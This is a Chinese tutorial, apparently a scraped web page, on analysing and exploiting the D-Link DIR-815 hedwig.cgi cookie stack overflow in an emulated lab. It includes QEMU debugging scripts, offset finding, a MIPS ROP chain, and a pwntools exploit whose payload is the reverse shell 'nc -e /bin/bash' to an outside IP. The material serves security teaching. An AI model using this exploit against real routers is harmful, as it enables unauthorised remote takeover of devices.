D-LINK DIR-815路由器漏洞分析与利用教程<\/h1>

1. 漏洞概述<\/h2>

D-LINK DIR-815路由器存在一个缓冲区溢出漏洞，影响"hedwig.cgi" CGI脚本。该漏洞允许未经认证的远程攻击者通过传递超长的Cookie值，导致程序栈溢出，从而可能获得路由器的远程控制权限。<\/p>

漏洞公告要点：<\/p>

漏洞组件：hedwig.cgi（实际是cgibin的符号链接）<\/li>
触发方式：通过HTTP_COOKIE字段传递超长uid值<\/li>
漏洞类型：栈缓冲区溢出<\/li>

影响：可能导致远程代码执行<\/li> <\/ul>

2. 环境准备<\/h2>

2.1 所需工具和资源<\/h3>

固件下载<\/strong>：<\/p>

ftp:\/\/ftp2.dlink.com\/PRODUCTS\/DIR-815\/REVA\/DIR-815_FIRMWARE_1.01.ZIP<\/li> <\/ul> <\/li>

调试工具<\/strong>：<\/p>

gdbserver各架构对应调试文件：https:\/\/github.com\/rapid7\/embedded-tools\/tree\/master\/binaries\/gdbserver<\/li>
IDA Pro 6.8\/7.5（用于静态分析和调试）<\/li>
Ghidra（用于MIPS架构反汇编和反编译）<\/li> <\/ul> <\/li>

仿真环境<\/strong>：<\/p>

qemu-mips仿真相关内核和虚拟硬盘：https:\/\/people.debian.org\/~aurel32\/qemu\/<\/li> <\/ul> <\/li> <\/ol>
2.2 固件提取<\/h3>
使用binwalk提取固件：<\/p>
binwalk -Me DIR-815_FIRMWARE_1.01.ZIP <\/span><\/span><\/code><\/pre>查找关键文件：<\/p> find . -name '*cgi'<\/span> <\/span><\/span>ls -l .\/htdocs\/web\/hedwig.cgi <\/span><\/span><\/code><\/pre>3. 漏洞分析<\/h2> 3.1 静态分析<\/h3> 使用IDA打开cgibin文件<\/li> 搜索字符串"HTTP_COOK"并通过交叉引用定位到hedwigcgi_main函数<\/li> 分析hedwigcgi_main函数流程：通过sess_get_uid()获取HTTP_COOKIE中uid=之后的值<\/li> 使用sprintf函数将内容拷贝到栈中<\/li> 未对输入大小进行限制，导致栈溢出<\/li> <\/ul> <\/li> <\/ol> 关键点：<\/p> 实际有两个sprintf函数调用，第二个才是真实环境利用的位置<\/li> 第一个sprintf在仿真环境中可能因缺少文件导致利用失败<\/li> <\/ul> 3.2 动态分析<\/h3> 3.2.1 QEMU用户模式调试<\/h4> 准备动态链接库：<\/li> <\/ol> mkdir -p .\/usr\/lib\/ <\/span><\/span>mkdir -p .\/lib\/x86_64-linux-gnu\/ <\/span><\/span>mkdir -p .\/lib64\/ <\/span><\/span>cp -p \/usr\/lib\/x86_64-linux-gnu\/libgmodule-2.0.so.0 .\/usr\/lib\/ <\/span><\/span>cp -p \/lib\/x86_64-linux-gnu\/libglib-2.0.so.0 .\/lib\/x86_64-linux-gnu\/ <\/span><\/span>cp -p \/lib\/x86_64-linux-gnu\/librt.so.1 .\/lib\/x86_64-linux-gnu\/ <\/span><\/span>cp -p \/lib\/x86_64-linux-gnu\/libm.so.6 .\/lib\/x86_64-linux-gnu\/ <\/span><\/span>cp -p \/lib\/x86_64-linux-gnu\/libgcc_s.so.1 .\/lib\/x86_64-linux-gnu\/ <\/span><\/span>cp -p \/lib\/x86_64-linux-gnu\/libpthread.so.0 .\/lib\/x86_64-linux-gnu\/ <\/span><\/span>cp -p \/lib\/x86_64-linux-gnu\/libc.so.6 .\/lib\/x86_64-linux-gnu\/ <\/span><\/span>cp -p \/lib\/x86_64-linux-gnu\/libdl.so.2 .\/lib\/x86_64-linux-gnu\/ <\/span><\/span>cp -p \/lib\/x86_64-linux-gnu\/libpcre.so.3 .\/lib\/x86_64-linux-gnu\/ <\/span><\/span>cp -p \/lib64\/ld-linux-x86-64.so.2 .\/lib64\/ <\/span><\/span><\/code><\/pre> 调试脚本示例（test.sh）：<\/li> <\/ol> #!\/bin\/bash <\/span><\/span><\/span><\/span>test=<\/span>$(<\/span>python -c "print 'uid='+open('content','r').read(2000)"<\/span>)<\/span> <\/span><\/span>LEN=<\/span>$(<\/span>echo -n "<\/span>$test"<\/span> | wc -c)<\/span> <\/span><\/span>PORT=<\/span>"1234"<\/span> <\/span><\/span>cp $(<\/span>which qemu-mipsel)<\/span> .\/qemu <\/span><\/span>sudo chroot . .\/qemu -E CONTENT_LENGTH=<\/span>$LEN \ <\/span><\/span><\/span><\/span>-E CONTENT_TYPE=<\/span>"application\/x-www-form-urlencoded"<\/span> \ <\/span><\/span><\/span><\/span>-E REQUEST_METHOD=<\/span>"POST"<\/span> \ <\/span><\/span><\/span><\/span>-E HTTP_COOKIE=<\/span>$test \ <\/span><\/span><\/span><\/span>-E REQUEST_URL=<\/span>"\/hedwig.cgi"<\/span> \ <\/span><\/span><\/span><\/span>-E REMOTE_ADDR=<\/span>"127.0.0.1"<\/span> \ <\/span><\/span><\/span><\/span>-g $PORT \/htdocs\/web\/hedwig.cgi 2>\/dev\/null <\/span><\/span>rm -f .\/qemu <\/span><\/span><\/code><\/pre> 使用patternLocOffset.py生成定位字符串：<\/li> <\/ol> python patternLocOffset.py -c -l 2000<\/span> -f content <\/span><\/span><\/code><\/pre>3.2.2 确定偏移量<\/h4> 自动确定：<\/li> <\/ol> python patternLocOffset.py -s 0x38694237 -l 2000<\/span> <\/span><\/span><\/code><\/pre> 手动确定：找到栈上缓冲区起始位置<\/li> 找到保存$RA的位置<\/li> 计算两者偏移<\/li> <\/ul> <\/li> <\/ol> 注意点：<\/p> 注意大小端问题<\/li> 第二个sprintf函数才是真实环境利用的位置<\/li> <\/ul> 4. ROP链构造<\/h2> 4.1 攻击目标<\/h3> 通过调用system('\/bin\/sh')获取shell权限。<\/p> 4.2 关键步骤<\/h3> 在libc.so中定位system函数地址<\/li> 将'\/bin\/sh'字符串放入栈中<\/li> 使用gadget将栈上的'\/bin\/sh'传入a0寄存器<\/li> 调用system函数<\/li> <\/ol> 4.3 注意事项<\/h3> cache incoherency问题<\/strong>：<\/p> MIPS CPU有指令cache和数据cache<\/li> 需要调用堵塞函数（如sleep(1)）确保数据写入内存<\/li> <\/ul> <\/li> 坏字符<\/strong>：<\/p> 可能的坏字符：0x20(空格)、0x00(结束符)、0x3a(冒号)、0x3f(问号)、0x3b(分号)、0x0a(换行符)等<\/li> <\/ul> <\/li> <\/ol> 5. QEMU系统模式仿真<\/h2> 5.1 环境配置<\/h3> 启动qemu系统：<\/li> <\/ol> sudo qemu-system-mipsel -M malta \ <\/span><\/span><\/span><\/span>-kernel vmlinux-3.2.0-4-4kc-malta \ <\/span><\/span><\/span><\/span>-hda debian_squeeze_mipsel_standard.qcow2 \ <\/span><\/span><\/span><\/span>-append "root=\/dev\/sda1 console=tty0"<\/span> \ <\/span><\/span><\/span><\/span>-net nic -net tap -nographic <\/span><\/span><\/code><\/pre>注意：确保内核和虚拟硬盘文件来自同一目录且大小端序匹配。<\/p> 5.2 网络配置<\/h3> 参考家用路由器研究详解入门中的网络配置方法，确保两台主机互通。<\/p> 5.3 文件系统准备<\/h3> 将提取的文件系统拷贝到mipsel虚拟机：<\/li> <\/ol> sudo scp -r squashfs-root root@192.168.x.x:\/root\/ <\/span><\/span><\/code><\/pre> 配置启动http服务（copy.sh）：<\/li> <\/ol> cp conf \/ <\/span><\/span>cp sbin\/httpd \/ <\/span><\/span>cp -rf htdocs\/ \/ <\/span><\/span>rm \/etc\/services <\/span><\/span>cp -rf etc\/ \/ <\/span><\/span>cp lib\/ld-uClibc-0.9.30.1.so \/lib\/ <\/span><\/span>cp lib\/libcrypt-0.9.30.1.so \/lib\/ <\/span><\/span>cp lib\/libc.so.0 \/lib\/ <\/span><\/span>cp lib\/libgcc_s.so.1 \/lib\/ <\/span><\/span>cp lib\/ld-uClibc.so.0 \/lib\/ <\/span><\/span>cp lib\/libcrypt.so.0 \/lib\/ <\/span><\/span>cp lib\/libgcc_s.so \/lib\/ <\/span><\/span>cp lib\/libuClibc-0.9.30.1.so \/lib\/ <\/span><\/span>cd \/ <\/span><\/span>ln -s \/htdocs\/cgibin \/htdocs\/web\/hedwig.cgi <\/span><\/span>ln -s \/htdocs\/cgibin \/usr\/sbin\/phpcgi <\/span><\/span>ln -s \/htdocs\/cgibin \/usr\/sbin\/hnap <\/span><\/span>.\/httpd -f conf <\/span><\/span><\/code><\/pre>5.4 测试访问<\/h3> 浏览器访问：<\/li> <\/ol> http:\/\/192.168.x.x:1234\/hedwig.cgi <\/code><\/pre> 或使用curl：<\/li> <\/ol> curl http:\/\/192.168.x.x:1234\/hedwig.cgi -v -X POST \ <\/span><\/span><\/span><\/span>-H "Content-Length: 8"<\/span> -b "uid=zh"<\/span> <\/span><\/span><\/code><\/pre>6. 漏洞利用<\/h2> 6.1 调试设置<\/h3> 设置环境变量：<\/li> <\/ol> export CONTENT_LENGTH=<\/span>"100"<\/span> <\/span><\/span>export CONTENT_TYPE=<\/span>"application\/x-www-form-urlencoded"<\/span> <\/span><\/span>export REQUEST_METHOD=<\/span>"POST"<\/span> <\/span><\/span>export REQUEST_URI=<\/span>"\/hedwig.cgi"<\/span> <\/span><\/span>export HTTP_COOKIE=<\/span>"uid=1234"<\/span> <\/span><\/span><\/code><\/pre> 关闭地址随机化：<\/li> <\/ol> echo 0<\/span> > \/proc\/sys\/kernel\/randomize_va_space <\/span><\/span><\/code><\/pre>6.2 调试脚本（debug.sh）<\/h3> #!\/bin\/bash <\/span><\/span><\/span><\/span>export CONTENT_LENGTH=<\/span>"100"<\/span> <\/span><\/span>export CONTENT_TYPE=<\/span>"application\/x-www-form-urlencoded"<\/span> <\/span><\/span>export HTTP_COOKIE=<\/span>"`cat content`"<\/span> <\/span><\/span>export REQUEST_METHOD=<\/span>"POST"<\/span> <\/span><\/span>export REQUEST_URI=<\/span>"\/hedwig.cgi"<\/span> <\/span><\/span>echo "uid=1234"<\/span>|.\/gdbserver.mipsel 192.168.x.x:9999 \/htdocs\/web\/hedwig.cgi <\/span><\/span><\/code><\/pre>6.3 确定libc基地址<\/h3> \/htdocs\/web\/hedwig.cgi & cat \/proc\/pid\/maps <\/span><\/span><\/code><\/pre>6.4 EXP示例<\/h3> #!\/usr\/bin\/python2<\/span> <\/span><\/span>from<\/span> pwn import<\/span> *<\/span> <\/span><\/span>context.<\/span>endian =<\/span> "little"<\/span> <\/span><\/span>context.<\/span>arch =<\/span> "mips"<\/span> <\/span><\/span> <\/span><\/span>base_addr =<\/span> 0x77f34000<\/span> <\/span><\/span>system_addr_1 =<\/span> 0x53200<\/span>-<\/span>1<\/span> <\/span><\/span>gadget1 =<\/span> 0x45988<\/span> <\/span><\/span>gadget2 =<\/span> 0x159cc<\/span> <\/span><\/span>cmd =<\/span> 'nc -e \/bin\/bash 192.168.79.145 9999'<\/span> <\/span><\/span> <\/span><\/span>padding =<\/span> 'A'<\/span> *<\/span> 973<\/span> # 1009-4*9<\/span> <\/span><\/span>padding +=<\/span> p32(base_addr +<\/span> system_addr_1) # s0<\/span> <\/span><\/span>padding +=<\/span> p32(base_addr +<\/span> gadget2) # s1<\/span> <\/span><\/span>padding +=<\/span> 'A'<\/span> *<\/span> 4<\/span> # s2<\/span> <\/span><\/span>padding +=<\/span> 'A'<\/span> *<\/span> 4<\/span> # s3<\/span> <\/span><\/span>padding +=<\/span> 'A'<\/span> *<\/span> 4<\/span> # s4<\/span> <\/span><\/span>padding +=<\/span> 'A'<\/span> *<\/span> 4<\/span> # s5<\/span> <\/span><\/span>padding +=<\/span> 'A'<\/span> *<\/span> 4<\/span> # s6<\/span> <\/span><\/span>padding +=<\/span> 'A'<\/span> *<\/span> 4<\/span> # s7<\/span> <\/span><\/span>padding +=<\/span> 'A'<\/span> *<\/span> 4<\/span> # fp<\/span> <\/span><\/span>padding +=<\/span> p32(base_addr +<\/span> gadget1) # ra<\/span> <\/span><\/span>padding +=<\/span> 'B'<\/span> *<\/span> 0x10<\/span> <\/span><\/span>padding +=<\/span> cmd <\/span><\/span> <\/span><\/span>f =<\/span> open("context"<\/span>,'wb'<\/span>) <\/span><\/span>f.<\/span>write(padding) <\/span><\/span>f.<\/span>close() <\/span><\/span><\/code><\/pre>7. 常见问题与解决方案<\/h2> QEMU仿真问题<\/strong>：<\/p> 确保内核和虚拟硬盘文件匹配<\/li> 注意大小端序选择正确的qemu版本<\/li> <\/ul> <\/li> 调试数据不一致<\/strong>：<\/p> 确保对指定内容同步观察<\/li> 注意IDA对内存读写的保护机制可能导致数据显示不全<\/li> <\/ul> <\/li> 环境变量设置<\/strong>：<\/p> 变量名和值之间不能有空格<\/li> 确保设置了所有必要的环境变量<\/li> <\/ul> <\/li> 浏览器访问问题<\/strong>：<\/p> 默认可能是https访问，需手动改为http<\/li> <\/ul> <\/li> 动态链接库问题<\/strong>：<\/p> 确保所有需要的库文件都已复制到正确位置<\/li> 注意库文件的权限和符号链接<\/li> <\/ul> <\/li> <\/ol> 8. 总结<\/h2> 本教程详细介绍了D-LINK DIR-815路由器漏洞的分析与利用过程，包括：<\/p> 环境搭建与固件提取<\/li> 静态分析与动态调试<\/li> 漏洞定位与偏移确定<\/li> ROP链构造与利用<\/li> QEMU系统模式仿真<\/li> 实际漏洞利用示例<\/li> <\/ol> 关键点：<\/p> 注意真实环境中第二个sprintf才是可利用点<\/li> 处理好cache incoherency问题<\/li> 注意坏字符的影响<\/li> 确保仿真环境配置正确<\/li> <\/ul> 通过本教程，读者可以学习到路由器漏洞分析的基本流程和方法，为后续的IoT安全研究打下基础。<\/p>